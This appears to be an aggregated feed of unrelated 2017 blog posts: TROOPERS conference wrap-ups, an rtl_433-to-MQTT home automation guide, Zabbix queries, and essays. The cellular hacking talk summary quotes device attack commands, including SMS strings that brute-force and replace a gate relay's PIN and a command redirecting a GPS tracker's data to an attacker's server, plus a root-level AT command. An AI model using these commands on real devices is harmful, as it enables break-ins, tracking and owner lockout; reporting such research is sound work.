Interaction with the ECU is performed via a bus. They are different bus systems: the most known is CAN (Controller Area Network), MOST (Media Oriented System Transport), Flexray, LIN (Local Interconnected Network), Ethernet or BroadR-Reach. Interesting fact, some BMW cars have an Ethernet port to speed up the upgrades of the infotainment (like GPS maps). Ethernet provides more bandwidth to upload big files. ECU hardware is based on some typical microcontrollers like Renesas, Freescale or Infineon. Infotainment systems are running on ARM sometimes x86. QNX, Linux or Android. A special requirement is to provide a fast response time after power on. Dieter showed a lot of pictures with ECU where you can easily identify main components (Radio, infotainment, telematics, etc). Many of them are manufactured by Peiker. This was a very quick introduction but this demonstrated that they are still space for plenty of research projects with cars. During the lunch break, I had an interesting chat with two people working at Audi. Security is clearly a hot topic for car manufacturers today!

For the next talk, I switched again to the other track and attended “PUF ’n’ Stuf” by Jacob Torrey & Anders Fogh. The idea behind this strange title was “Getting the most of the digital world through physical identities”. The title came from a US TV show popular in the 60’s. Today, within our ultra-connected digital world, we are moving our identity from a physical world and it becomes difficult to authenticated somebody. We are losing the “physical” aspect. Humans can quickly spot an imposter just by having a look at a picture and after a simple conversation. Even if you don’t personally know the person. But to authenticate people via a simple login/password pair, it becomes difficult in the digital world. The idea of Jacob & Anders was to bring a strong physical identification in the digital world. The concept is called “PUF” or “Physically Uncloneable Function“. To achieve this, they explained how to implement a challenge-response function for devices that should return responses as non-volatile as possible. This can be used to attest the execution state or generate device-specific data. They reviewed examples based on SRAM, EEPROM or CMOS/CCD. The latest example is interesting. The technique is called PRNU and can be used to uniquely identify image sensors. This is often used in forensic investigation to link a picture to a camera. You can see this PUF as a dual-factor authentication. But there are caveats like a lack of proper entropy or PUF spoofing. Interesting idea but no easy to implement in practical cases.

After the lunch, Stefan Kiese had a two-hours slot to present “The Hardware Striptease Club”. The idea of the presentation was to briefly introduce some components that we can find today in our smart houses and see how to break them from a physical point of view. Stefan briefly explained the methodology to approach those devices. When you do this, never forget the impact (loss of revenue, theft of credentials, etc… or worse life (pacemakers, cars). Some reviewed victims:

  • TP-Link NC250 (Smart home camera)
  • Netatmo weather station
  • BaseTech door camera
  • eQ-3 home control access point
  • Easy home wifi adapter
  • Netatmo Welcome

It made an electronic crash course but also insisted on the risks to play with electricity powered devices! Then, people were able to open and disassemble the devices to play with them.

I didn’t attend the second hour because another talk looked interesting: “Metasploit hardware bridge hacking” by Craig Smith. He is working at Rapid7 and is playing with all “moving” things from cars to drones. To interact with those devices, a lot of tools and gadgets are required. The idea was to extend the Metasploit framework to be able to pentest these new targets. With an estimation of 20.8 billions of IoT devices connected (source: Gartner), pentesting projects around IoT devices will be more and more frequent. Many tools are required to test IoT devices: RF Transmitters, USB fuzzers, RFID cloners, JTAG devices, CAN bus tools, etc. The philosophy behind Metasploit remains the same: based on modules (some exploits, some payload, some shellcodes). New modules are available to access relays which talk directly to the hardware module. Example:

msf> use auxililary/server/local_hwbridge

A Metasploit relay is a lightweight HTTP server that just makes JSON translations between the bridge and Metasploit.

Example: ELM327 diagnostic module can be used via serial USB or BT. Once connected all the classic framework features are available as usual:

./tools/hardware/elm327_relay.rb

Other supported relays are RF transmitter or Zigbee. This was an interesting presentation.

For the last time slot, there was two talks: one about vulnerabilities in TP-Link devices and one presented as “Looking through the web of pages to the Internet of Things“. I chose the second one presented by Gabriel Weaver. The abstract did not describe properly the topic (or I did not understand it) but the presentation was a review of the research performed by Gabriel: “CTPL” or “Cyber Physical Topology Language“.

That’s close the 2nd day. Tomorrow will be dedicated to the regular tracks. Stay tuned for more coverage.

[The post TROOPERS 2017 Day #2 Wrap-Up has been first published on /dev/random]

March 20, 2017

I’m in Heidelberg (Germany) for the 10th edition of the TROOPERS conference. The regular talks are scheduled on Wednesday and Thursday. The two first days are reserved for some trainings and a pre-conference event called “NGI” for “Next Generation Internet” focusing on two hot topics: IPv6 and IoT. As said on the website: “NGI aims to provide discussion on how to secure these core technologies by bringing together practitioners from this space and some of the smartest researchers of the respective fields”. I initially planned to attend talks from both worlds but I stayed in the “IoT” tracks because many talks were interesting.

The day started with a keynote by Steve Lord: ”Of Unicorns and replicants”. Steve flagged his keynote as a “positive” talk (usually, we tend to present negative stuff). It started with some facts like “The S in IoT stands for Security” and a recap of the IoT history. This is clearly not a new idea. The first connected device was a Coca-Cola machine that was available via finger in… 1982! Who’s remember this old-fashioned protocol? In 1985, came the first definition of “IoT”: It is the integration of people, processes and technology with connectable devices and sensors to enable remote monitoring status. In 2000, LG presented its very first connected fridge. 2009 was a key year with the explosion of crowdfunding campaigns. Indeed, many projects were born due to the financial participations of many people. It was a nice way to bring ideas to life. In 2015, Vizio smart TV’s started to watch at you. Of course, Steve talked also about the story of St-Jude Medical and their bad pacemakers story. Common IoT problems are: botnets, endpoints, the overreach (probably the biggest problem) and the availability (You remember the outage that affected Amazon a few days ago?). The second part of the keynote was indeed positive and Steve reviewed the differences between 2015 – 2017. In the past, cloud solutions were not so mature, there was communication issues, little open guidance and unrealistic expectations. People learn by mistakes and some companies don’t want to have nightmare stories like others and are investing in security. So, yes, things are going (a little bit) better because more people are addressing security issues.

The first talk was “IoT hacking and Forensic with 0-day” by Moonbeom Park & Soohyun Jin. More and more IoT devices have been involved in security incident cases. Mirai is one of the latest examples. To address this problem, the speakers explained their process based on these following steps: Search for IoT targets, analyze the filesystem or vulnerabilities, attack and exploit, analyze the artefacts, install a RAT and control using a C&C then perform incident response using forensic skills. The example they used was a vacuum robot with a voice recording feature. The first question is just… “why?”. They explained how to compromize the device which was, at the beginning, properly hardened.  But, it was possible to attack the protocol used to configure it. Some JSON data was sent in clear text with the wireless configuration details. Once the robot reconfigured to use a rogue access-point, root access on the device was granted. That’s nice but how to control the robot, its camera and microphone? To idea was to turn in into a spying device. They explained how to achieve this and played a nice demo:

Vacuum robot spying device

So, why do we need IoT forensics? IoT devices can be involved in incidents.Issues? One of the issues is the way data are stored. There is no HD but flash memory. Linux remains the first OS used by IoT devices (73% according to the latest IoT developers survey). It is important to be able to extract the filesystem from such devices to understand how they work and to collect logs. Usually, filesystems are based on SquashFS and UBIFS. Tools were presented to access those data directly from Python. Example: the ubi_reader module. Once the filesystem details accessible, the forensic process remains the same.

The next talk was dedicated to SDR (Software Defined Radio) by Matt Knight & Marc Newline from Bastille: “So you want to hack radios?”. The idea behind this talk was to open our eyes on all the connected devices that implement SDR. Why should we care about radio communications? Not that they are often insecure but they are deployed everywhere. They are also built on compromises: big size and costs constraints, weak batteries, the deployment scenarios are challenging and, once in the wild, they are difficult to patch. Matt and Marc explained during the talk how to perform reverse engineering. They are two approaches: hardware & software defined radio. They reviewed pro & con. How to perform reverse engineering a radio signal? Configure yourself as a receiver and try to map symbols. This is a five steps process:

  • Identify the channel
  • Identify the modulation
  • Determine the symbol rate
  • Synchronize
  • Extract symbols

In many cases, OSINT is helpful to learn how it works (find online documentation). Many information is publicly available (example: on the FCC website – Just check for the FCC ID on the back of the device to get interesting info). They briefly introduced the RF concept then the reverse engineering workflow. To achieve this, they based the concept on different scenarios:

  • A Z-Wave home automation protocol
  • A door bell (capture button info and then replay to make the doorbell ring of course
  • An HP wireless keyboard/mouse

After the lunch, Vladimir Wolstencroft presented “SIMBox Security: Fraud, Fun & Failure”. This talk was tagged as TLP:RED so no coverage but very nice content! It was one of my best talk for today.

The next one was about the same topic: “Dissecting modern cellular 3G/4G modems” by Harald Welte. This talk is the result of a research conducted by Harald. His company was looking for a new M2M (“Machine to Machine”) solution. They searched interesting devices and started to see what was in the box. Once the good candidate found (the EC2O from Quectel), they started a security review and, guess what, they made nice findings. First, the device contained some Linux code. Based on this, all manufacturers have to respect the GPL and to disclose the modified source code. It takes a long time to get the information from Quectel). By why is Linux installed on this device? For Harald, it just increased the complexity. Here is a proof with the slide explaining how the device is rebooted:

Reboot Process

Crazy isn’t it? Another nice finding was the following AT command:

AT+QLINUXCMD=

It allows to send Linux commands to the devices in read/write mode and as root. What else?

The last talk “Hacks & case studies: Cellular communications” was presented by Brian Butterly. Brian’s motto is “to break things you must understand how they work”. The first step, read as much as possible, then build your lab to play with the selected targets. Many IoT devices today use GSM networks to interact with them via SMS or calls. Others also support TCP/IP communications (data). After a brief introduction to mobile network and how to deploy your own. An important message from Brian: Technically, nothing prevents to broadcast valid networks ID’s (but the law does it :-).

It’s important to understand how a device connects to a mobile network:

  • First, connect to its home network if available
  • Otherwise, do NOT connect to a list of blacklisted networks
  • Then connect to the network with the strongest signal.

If you deploy your own mobile network, you can make target devices connect to your network and play MitM. So, what can we test? Brian reviewed different gadgets and how to abuse them / what are their weaknesses.

First case: a small GPS Tracker with an emergency button. The Mini A8 (price: 15€). Just send a SMS with “DW” and the device will reply with a SMS containing the following URL:

http://gpsui.net/smap.php?lac=1&cellid=2&c=262&n=23&v=6890 Battery:70%

This is not a real GPS tracker, it returns the operation (“262” is Germany) and tower cell information. If you send “1111”, it will enable the built-in microphone. When the SOS button is pressed, a message is sent to the “authorized” numbers. The second case was a gate relay (RTU5025 – 40€). It allows opening a door via SMS or call. It’s just a relay in fact. Send “xxxxCC” (xxxx is the pin) to unlock the door. Nothing is sent back if the PIN is wrong. This means that it’s easy to brute force the device. Even better, once you found the PIN, you can send “xxxxPyyyy” to replace the PIN xxxx with a new one yyyy (and lock out the owner!). The next case was the Smanos X300 home alarm system (150€). Can be also controlled by SMS or calls (to arm, disarm and get notifications). Here again, there is a lack of protection and it’s easy to get the number and to fake authorized number to just send a “1” or “0”.

The next step was to check IP communications used by devices like the GPS car tracker (TK105 – 50€). You can change the server using the following message:

adminip 123456 101.202.101.202 9000

And define your own web server to get the device data. More fun, the device has a relay that can be connected to the car oil pump to turn the engine off (if the car is stolen). It also has a microphone and speaker. Of course, all communications occur over HTTP.

The last case was a Siemens module for PLC (CMR 2020). It was not perfect but much better than the other devices. By example, passwords are not only 4 numbers PIN codes but a real alphanumeric password.

Two other examples: a SmartMeter sending UDP packets in clear text with the meter serial number is all packets). And a Solar system control box running Windows CE 6.x. Guest what? The only way to manage the system is via Telnet. Who said that Telnet is dead?

It’s over for today. Stay tuned for more news by tomorrow!

[The post TROOPERS 2017 Day #1 Wrap-Up has been first published on /dev/random]

CurrentCost?

CurrentCost is a UK company founded in 2010 which provides home power measuring hardware. Their main product is a transmitter which uses an inductive clamp to measure power usage of your household. On top of that, they also provide Individual Appliance Monitors (IAMs) which sit between your device and the outlet, and measure its power usage.

The transmitters broadcast their findings wirelessly. To display the data, a number of different displays are sold, which can indicate total usage, per-IAM data, trending and even cost if you care to set that up. I myself have the EnviR, which has USB connectivity (with an optional cable) so you can process the CurrentCost data on your computer. Up to 9 IAMs can be connected to the EnviR.

I bought my CurrentCost products over 5 years ago, it does look like they are still on sale. CurrentCosts operates an eBay store where you can buy their hardware, if you’re not in the UK.

Important note: Should you decide to acquire any of their IAM hardware, do note that their “EU” IAM plugs are in fact “Schuko” type F type, which is used in Germany and The Netherlands, with side ground contacts instead of a grounding pin. That wouldn’t be so much of an issue, except that they don’t have an accommodating hole for the pin, so they won’t fit standard EU (non-German, non-Dutch, type E) outlets without a converter! The device-side is usually fine, as most if not all plugs also support side ground contacts, and if they don’t, at least the lack of a pin does not impede plugging it in.

OpenHAB?

OpenHAB is an open source, Java-powered Home Automation Bus; what this basically means is it’s a centralized hub that can connect to many systems that have found their way into your house, such as your smart TV, your ethernet-capable Audio Receiver, Hue lighting, Z-Wave- or Zigbee-powered accessories, HVAC systems, Kodi, CUPS, and even anything that speaks SNMP or MQTT or Amazon’s Alexa. It’s pretty much fully able to integrate into anything you can throw at it.

If you’re not already using OpenHAB, this post may not be very useful to you… Yet.

MQTT?

MQTT (short for Message Queue Telemetry Transport) is publish-subscribe-based “lightweight” messaging protocol. In short, you run a (or multiple) MQTT broker, and then clients can “subscribe” to certain topics (topics being freehand names, pretty much), and other clients, or the same ones even, can “publish” data in those same topics.

MQTT is a quick and elegant solution to have data circulate between different services, over the network or on the local machine – the fact that that data is broadcast over certain topics means multiple listeners (“subscribers”) can all act on that same data being published.

OpenHAB supports MQTT in both directions – it can listen to incoming topics, or broadcast certain things over MQTT as well.

The configuration below assumes you already have an MQTT broker to publish the radio messages to; setting up Mosquitto or similar is out of scope for this article.

Getting data out of CurrentCost

The EnviR outputs the following string regularly (every 6 seconds) over its USB serial port:

<msg><src>CC128-v1.48</src><dsb>00012</dsb><time>22:18:34</time><tmpr>24.9</tmpr><sensor>0</sensor><id>02015</id><type>1</type><ch1><watts>00876</watts></ch1></msg>

This is a line of data reporting power data sent by sensor ID 2015 (every sensor has their own 12-bit ID), of type 1 (this is either the main unit, or an IAM) reporting 876W on the first channel. The <tmpr> field is indeed a temperature reading, this is powered by a temperature sensor inside the EnviR and it simply measures the temperature where your display is located.

Back in 2012, I wrote a set of PHP scripts parsing this data and putting it into separate files in /tmp, with a separate script then throwing this data into RRD files every minute to be visualised in graphs. I never published it because to be frank it was a bit of an ugly hack. However it did work, and I had perfect visibility into when my 3 monitors went into standby, when the TV/Home theater amplifier was on, etc.

After getting a taste of this, spurred on by JP, I dived into Home Automation and ended up using OpenHAB. For years I’ve “planned” to write a CurrentCost binding for OpenHAB, so it would natively support the XML serial protocol, and just read out everything automatically. I never got around to figuring out how to create an OpenHAB binding though, so my stats were separate in those RRD files for years. When I moved, I didn’t even reinstall the CurrentCost sensors, as I was already using Z-Wave based power sensors for most things I wanted to measure.

In the meanwhile I also encountered current-cost-forwarder which listens for the XML data and sends it over to an MQTT broker. That did alleviate the need for a dedicated binding, but I never got around to trying this out, so I can’t tell you how well it works.

The magic of RTLSDR

RTLSDR is a great software defined radio (SDR) based on very cheap Realtek RTL28xx chips, originally meant to receive DVB-T broadcast. This means you can pretty much listen in on any frequency between ~22MHz and ~1100MHz, including FM radio, ADS-B aircraft data, and many others. And by cheap, I do mean cheap, you can find RTLSDR-compatible USB dongles on eBay for 5€ or less!

CurrentCost transmitters use the 433MHz frequency, like many other home devices (car keys, wireless headphones, garage openers, weather stations, …). As I was playing around with the rtl_433 tool, which uses RTLSDR to sniff 433MHz communications, I noticed my CurrentCost sensor data passing by as well. That gave me the idea for this system, and the setup in use that led to this blog post.

Additional advantages for this are that you can now use as many IAMs as you want and are no longer limited to 9, and there is no need to have the EnviR connected to one of your server’s USB ports. In fact, you don’t even need the EnviR display at all, and can even drop the base transmitter if you only want to read out IAM data.

As an extra, any other communication picked up by rtl_433 on 433MHz will also be automatically piped into MQTT for consumption by anything else you want to run. If you (or your neighbours!) have a weather station, anemometer or anything else transmitting on 433MHz (and supported by rtl_433), you can consume this data in OpenHAB just as well!

Sniffing the 433MHz band

First off, let’s install rtl_433:

~# apt-get install rtl-sdr librtlsdr-dev cmake build-essential
~# git clone https://github.com/merbanan/rtl_433.git
Cloning into 'rtl_433'...
remote: Counting objects: 5722, done.
(...)
Checking connectivity... done.
~# cd rtl_433/
~/rtl_433# mkdir build
~/rtl_433# cd build
~/rtl_433/build# cmake ..
-- The C compiler identification is GNU 4.9.2
(...)
-- Build files have been written to: /root/rtl_433/build
~/rtl_433/build# make
~/rtl_433/build# make install

Once it’s been installed, let’s do a test run. If you have CurrentCost transmitters plugged in, you should see their data flash by. Unfortunately, nobody in my neighbourhood seems to have any weather stations or outdoor temperature sensors, so only CurrentCost output for me:

~# rtl_433 -G
Using device 0: Generic RTL2832U
Found Rafael Micro R820T tuner
Exact sample rate is: 250000.000414 Hz
Sample rate set to 250000.
Bit detection level set to 0 (Auto).
Tuner gain set to Auto.
Reading samples in async mode...
Tuned to 433920000 Hz.
2017-02-27 17:53:12 : CurrentCost TX
Device Id: 2015
Power 0: 26 W
Power 1: 0 W
Power 2: 0 W

To end the program, press ctrl-C.

What we can see in the output here:
Device Id: the same device ID as was reported by the EnviR’s XML protocol. It likely changes when you press the pair button.
Power 0: This is the only power entry you’ll see for IAM modules, the base device may also report data for the second and third clamp.

It is possible you see the following error when running rtl_433:

Kernel driver is active, or device is claimed by second instance of librtlsdr.
In the first case, please either detach or blacklist the kernel module
(dvb_usb_rtl28xxu), or enable automatic detaching at compile time.

This means your OS has autoloaded the DVB drivers when you plugged in your USB stick, before you installed the rtl-sdr package. You can unload them manually:

rmmod dvb_usb_rtl28xxu rtl2832

The rtl-sdr package contains a blacklist entry for this driver, so it shouldn’t be a problem anymore from now on. Then, try running the command again.

Relaying 433MHz data to MQTT

Install mosquitto-clients, which provides mosquitto_pub which will be used to publish data to the broker:

~# apt-get install mosquitto-clients

Next, install the systemd service file which will run the relay for us:

~# cat <<EOF /etc/systemd/system/rtl_433-mqtt.service
[Unit]
Description=rtl_433 to MQTT publisher
After=network.target
[Service]
ExecStart=/bin/bash -c "/usr/local/bin/rtl_433 -q -F json |/usr/bin/mosquitto_pub -h <your.broker.hostname> -i RTL_433 -l -t RTL_433/JSON"
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
~# systemctl daemon-reload
~# systemctl enable rtl_433-mqtt

This will publish JSON-formatted messages containing the 433MHz data to your MQTT broker on the RTL_433/JSON topic.

Don’t forget to replace your broker’s hostname on the correct line. I tried to make it use an Environment file first, but unfortunately ran into a few issues using those variables, due to needing to run the command in an actual shell because of the pipe. If you figure out a way to make that work, please do let me know.

See if it works

We can subscribe to the MQTT topic using the mosquitto_sub tool from the mosquitto-clients package:

mosquitto_sub -h <your.broker.hostname> -t RTL_433/JSON

Doing this should yield a number of output lines such as this:

{"time" : "2017-03-19 21:26:25", "model" : "CurrentCost TX", "dev_id" : 2015, "power0" : 0, "power1" : 0, "power2" : 0}

Press Ctrl-C to exit the utility. If this didn’t yield any useful JSON output, check the status of the service with systemctl status rtl_433-mqtt and correct any issues.

Add items to OpenHAB

The following instructions were written for OpenHAB 1.x. Even though OpenHAB 2.x has a new way of adding “things” and “channels”, they work on that version as well – there is no automatic web-based configuration for MQTT items anyway.

Create items such as these in the OpenHAB items file of your choice (where this is exactly depends on your OpenHAB major version and whether you installed using debian packages or from the zip file).

Number Kitchen_Boiler_Power "Kitchen Boiler [%.1f W]" (GF_Kitchen) { mqtt="<[your.broker.hostname:RTL_433/JSON:state:JSONPATH($.power0):.*\"dev_id\" \\: 2015,.*]"}

Replace the dev_id being matched (2015 in the example above) with the ID of your CurrentCost transmitter. As all rtl_433 broadcasts come in on the same topic, a regular expression is used to match a single Device Id. If you want to read another phase, replace power0 by power1 or power2.

If you want to receive other 433MHz broadcasts, you may need to change the regex to make sure it’s only catching CurrentCost sensors – although the dev_id match alone might be enough. Let me know!

&url Writing informative technical how-to documentation takes time, dedication and knowledge. Should my blog series have helped you in getting things working the way you want them to, or configure certain software step by step, feel free to tip me via PayPal (paypal@powersource.cx) or the Flattr button. Thanks!

March 19, 2017

I published the following diary on isc.sans.org: “Searching for Base64-encoded PE Files“.

When hunting for suspicious activity, it’s always a good idea to search for Microsoft Executables. They are easy to identify: They start with the characters “MZ” at the beginning of the file. But, to bypass classic controls, those files are often obfuscated (XOR, Rot13 or Base64)… [Read more]

[The post [SANS ISC] Searching for Base64-encoded PE Files has been first published on /dev/random]

Almost all of the video recordings from FOSDEM 2017 have been cut, transcoded, and released. There are a handful of talks left to fix up, which will happen no later than next weekend. The weekend after that, we plan to shut down this year's video-processing infrastructure, unless something important pops up. Videos are linked from the individual schedule pages for the talks and the full schedule page. They are mirrored from video.fosdem.org. While all videos have been reviewed by a human before they were released, it remains possible that one or more issues fell through the cracks. Therefore, if you舰

March 18, 2017

I published the following diary on isc.sans.org: “Example of Multiple Stages Dropper“.

If some malware samples remain simple (see my previous diary), others try to install malicious files in a smooth way to the victim computers. Here is a nice example that my spam trap captured a few days ago. The mail looks like a classic phishing attempt… [Read more]

[The post [SANS ISC Diary] Example of Multiple Stages Dropper has been first published on /dev/random]

March 17, 2017

It seems to be the new sport of nitwit moronic world leaders like Trump and Erdogan to bash Frau Merkel.

It makes me respect her more.

The YMCA is a leading nonprofit dedicated to strengthening communities through youth development, healthy living and social responsibility. Today, the YMCA serves more than 58 million people in 130 countries around the world. The YMCA is a loose federation, meaning that each association operates independently to best meet the needs of the local community. In the United States alone, there are 874 associations, each with their own CEO and board of directors. As associations vary in both size and scale, each YMCA is responsible for maintaining their own digital systems and tools at their own expense.

In 2016, the YMCA of Greater Twin Cities set out to develop a Drupal distribution, called Open Y. The goal of Open Y was to build a platform to enable all YMCAs to operate as a unified brand through a common technology.

Features of the Open Y platform

Open Y strives to provide the best customer experience for their members. The distribution, developed on top of Drupal 8 in partnership with Acquia and FFW, offers a robust collection of features to deliver a multi channel experience for websites, mobile applications, digital signage, and fitness screens.

On an Open Y website customers can schedule personal training appointments, look up monthly promotions, or donate to their local YMCA online. Open Y also takes advantage of Drupal 8's APIs to integrate all of their systems with Drupal. This includes integration with Open Y's Customer Relationship Management (CRM) and eCommerce partners, but also extends to fitness screens and wearables like Fitbit. This means that Open Y can use Drupal as a data repository to serve content, such as alerts or program campaigns, to digital signage screens, connected fitness consoles and popular fitness tracking applications. Open Y puts Drupal at the core of their digital platform to provide members with seamless and personalized experiences.

Philosophy of collaboration

The founding principle of Open Y is that the platform adopts a philosophy of collaboration that drives innovation and impact. Participants of Open Y have developed a charter that dictates expectations of collaboration and accountability. The tenets of the charter allow for individual associations to manage their own projects and to adopt the platform at their own pace. However, once an association adopts Open Y, they are expected to contribute back any new features to the Open Y distribution.

As a nonprofit, YMCAs cannot afford expensive proprietary licenses. Because participating YMCAs collaborate on the development of Open Y, and because there are no licensing fees associated with Drupal, the total cost of ownership is much lower than proprietary solutions. The time and resources that are saved by adopting Drupal allows YMCAs around the country to better focus on their customers' experience and lean into innovation. The same could not be achieved with proprietary software.

For example, the YMCA of Greater Seattle was the second association to adopt the Open Y platform. When building its website, the YMCA of Greater Seattle was able to repurpose over a dozen modules from the YMCA of the Greater Twin Cities. That helped Seattle save time and money in their development. Seattle then used their savings to build a new data personalization module to contribute back to the Open Y community. The YMCA of the Greater Twin Cities will be able to benefit from Seattle's work and adopt the personalization features into its own website. By contributing back and by working together on the Open Y distribution, these YMCAs are engaging in a virtuous cycle that benefits their own projects.

The momentum of Open Y

In less than one year, 18 YMCA associations have committed to adopting Open Y and over 22 other associations are currently evaluating the platform. Open Y has created a platform that all stakeholders under the YMCA brand can use to collaborate through a common technology and a shared philosophy.

Open Y is yet another example of how organizations can challenge the prevailing model of digital experience delivery. By establishing a community philosophy that encourages contribution, Open Y has realized accelerated growth, feature development, and adoption. Organizations that are sharing contributions and embracing collaboration are evolving their operating models to achieve more than ever before.

Because I am passionate about the Open Y team's mission and impact, I have committed to be an advisor and sponsor to the project. I've been advising them since November 2016. Working with Open Y is a way for me to give back, and it's been very exciting to witness their progress first hand.

If you want to help contribute to the Open Y project, consider attending their DrupalCon Baltimore session on building custom Drupal distributions for federated organizations. You can also connect with the Open Y team directly at OpenYMCA.org.

Imagine you have a duck. Imagine you have a wall. Now imagine you throw the duck with a lot of force against a wall. Duck typing means that the duck hitting the wall quacks like a duck would.

ps. Replace wall with API and duck with ugly stupid script written by an idiot. You can leave quacks.

March 16, 2017

The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

If you run Zabbix long enough, eventually your database will grow to sizes you'd rather not see. And that begs the question: what items are causing the most storage in my Zabbix backend, be it MySQL, PostgreSQL or something else?

I investigated the same questions and found the following queries to be very useful.

Before you start to look into this, make sure you cleanup your database of older orphaned records first, see an older post of mine for more details.

What items have the most value records?

These probably also consume the most diskspace.

For the history_uint table (holds all integer values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_uint AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history table (holds all float & double values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history_text table (holds all text values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_text AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

These days, most large FLOSS communities have a "Code of Conduct"; a document that outlines the acceptable (and possibly not acceptable) behaviour that contributors to the community should or should not exhibit. By writing such a document, a community can arm itself more strongly in the fight against trolls, harassment, and other forms of antisocial behaviour that is rampant on the anonymous medium that the Internet still is.

Writing a good code of conduct is no easy matter, however. I should know -- I've been involved in such a process twice; once for Debian, and once for FOSDEM. While I was the primary author for the Debian code of conduct, the same is not true for the FOSDEM one; I was involved, and I did comment on a few early drafts, but the core of FOSDEM's current code was written by another author. I had wanted to write a draft myself, but then this one arrived and I didn't feel like I could improve it, so it remained.

While it's not easy to come up with a Code of Conduct, there (luckily) are others who walked this path before you. On the "geek feminism" wiki, there is an interesting overview of existing Open Source community and conference codes of conduct, and reading one or more of them can provide one with some inspiration as to things to put in one's own code of conduct. That wiki page also contains a paragraph "Effective codes of conduct", which says (amongst others) that a good code of conduct should include

Specific descriptions of common but unacceptable behaviour (sexist jokes, etc.)

The attentive reader will notice that such specific descriptions are noticeably absent from both the Debian and the FOSDEM codes of conduct. This is not because I hadn't seen the above recommendation (I had); it is because I disagree with it. I do not believe that adding a list of "don't"s to a code of conduct is a net positive to it.

Why, I hear you ask? Surely having a list of things that are not welcome behaviour is a good thing, which should be encouraged? Surely such a list clarifies the kind of things your does not want to see? Having such a list will discourage that bad behaviour, right?

Well, no, I don't think so. And here's why.

Enumerating badness

A list of things not to do is like a virus scanner. For those not familiar with these: on some operating systems, there is specific piece of software that everyone recommends you run, which checks if particular blobs of data appear in files on the disk. If they do, then these files are assumed to be bad, and are kicked out. If they do not, then these files are assumed to be not bad, and are left alone (for the most part).

This works if we know all the possible types of badness; but as soon as someone invents a new form of badness, suddenly your virus scanner is ineffective. Additionally, it also means you're bound to continually have to update your virus scanner (or, as the case may be, code of conduct) to a continually changing hostile world. For these (and other) reasons, enumerating badness is listed as number 2 in security expert Markus Ranum's "six dumbest ideas in computer security," which was written in 2005.

In short, a list of "things not to do" is bound to be incomplete; if the goal is to clarify the kind of behaviour that is not welcome in your community, it is usually much better to explain the behaviour that is wanted, so that people can infer (by their absense) the kind of behaviour that isn't welcome.

This neatly brings me to my next point...

Black vs White vs Gray.

The world isn't black-and-white. We could define a list of welcome behaviour -- let's call that the whitelist -- or a list of unwelcome behaviour -- the blacklist -- and assume that the work is done after doing so. However, that wouldn't be true. For every item on either the white or black list, there's going to be a number of things that fall somewhere in between. Let's call those things as being on the "gray" list. They're not the kind of outstanding behaviour that we would like to see -- they'd be on the white list if they were -- but they're not really obvious CoC violations, either. You'd prefer it if people don't do those things, but it'd be a stretch to say they're jerks if they do.

Let's clarify that with an example:

Is it a code of conduct violation if you post links to pornography websites on your community's main development mailinglist? What about jokes involving porn stars? Or jokes that denigrate women, or that explicitly involve some gender-specific part of the body? What about an earring joke? Or a remark about a user interacting with your software, where the women are depicted as not understanding things as well as men? Or a remark about users in general, that isn't written in a gender-neutral manner? What about a piece of self-deprecating humor? What about praising someone else for doing something outstanding?

I'm sure most people would agree that the first case in the above paragraph should be a code of conduct violation, whereas the last case should not be. Some of the items in the list in between are clearly on one or the other side of the argument, but for others the jury is out. Let's call those as being in the gray zone. (Note: no, I did not mean to imply that the list is ordered in any way ;-)

If you write a list of things not to do, then by implication (because you didn't mention them), the things in the gray area are okay. This is especially problematic when it comes to things that are borderline blacklisted behaviour (or that should be blacklisted but aren't, because your list is incomplete -- see above). In such a situation, you're dealing with people who are jerks but can argue about it because your definition of jerk didn't cover teir behaviour. Because they're jerks, you can be sure they'll do everything in their power to waste your time about it, rather than improving their behaviour.

In contrast, if you write a list of things that you want people to do, then by implication (because you didn't mention it), the things in the gray area are not okay. If someone slips and does something in that gray area anyway, then that probably means they're doing something borderline not-whitelisted, which would be mildly annoying but doesn't make them jerks. If you point that out to them, they might go "oh, right, didn't think of it that way, sorry, will aspire to be better next time". Additionally, the actual jerks and trolls will have been given less tools to argue about borderline violations (because the border of your code of conduct is far, far away from jerky behaviour), so less time is wasted for those of your community who have to police it (yay!).

In theory, the result of a whitelist is a community of people who aspire to be nice people, rather than a community of people who simply aspire to be "not jerks". I know which kind of community I prefer.

Giving the wrong impression

During one of the BOFs that were held while I was drafting the Debian code of conduct, it was pointed out to me that a list of things not to do may give the impression to people that all these things on this list do actually happen in the code's community. If that is true, then a very long list may produce the impression that the given community is a community with a lot of problems.

Instead, a whitelist-based code of conduct will provide the impression that you're dealing with a healthy community. Whether that is the case obviously depends on more factors than just the code of conduct itself, but it will put people in the right mindset for this to become something of a self-fulfilling prophecy.

Conclusion

Given all of the above, I think a whitelist-based code of conduct is a better idea than a blacklist-based one. Additionally, in the few years since the Debian code of conduct was accepted, it is my impression that the general atmosphere in the Debian project has improved, which would seem to confirm that the method works (but YMMV, of course).

At any rate, I'm not saying that blacklist-based codes of conduct are useless. However, I do think that whitelist-based ones are better; and hopefully, you now agree, too ;-)

March 15, 2017

For the last 24 hours, the Twitter landscape has seen several official accounts hacked. The same Tweet was posted thousand times. It was about the political conflict between Turkey and Holland:

Amnesty Fake Tweet

